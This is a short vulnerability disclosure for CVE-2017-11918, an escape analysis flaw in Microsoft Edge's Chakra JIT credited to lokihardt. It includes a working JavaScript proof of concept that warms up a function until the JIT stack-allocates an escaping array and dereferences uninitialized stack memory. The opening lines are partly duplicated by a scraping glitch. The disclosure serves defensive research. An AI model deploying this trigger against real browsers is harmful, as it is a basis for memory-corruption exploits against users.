Microsoft Edge: Chakra: JIT: Escape analysis bug

CVE-2017-11918


Escape analysis: <a href="https://en.wikipedia.org/wiki/Escape_analysis" title="& Microsoft Edge: Chakra: JIT: Escape analysis bug

CVE-2017-11918


Escape analysis: <a href="https://en.wikipedia.org/wiki/Escape_analysis" title="" class="" rel="nofollow">https://en.wikipedia.org/wiki/Escape_analysis</a>

Chakra fails to detect if "tmp" escapes the scope, allocates it to the stack. This may lead to dereference uninitialized stack values.

PoC:
function opt() {
let tmp = [];
tmp[0] = tmp;
return tmp[0];
}

function main() {
for (let i = 0; i < 0x1000; i++) {
opt();
}

print(opt()); // deref uninitialized stack pointers!
}

main();



This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.




Found by: lokihardt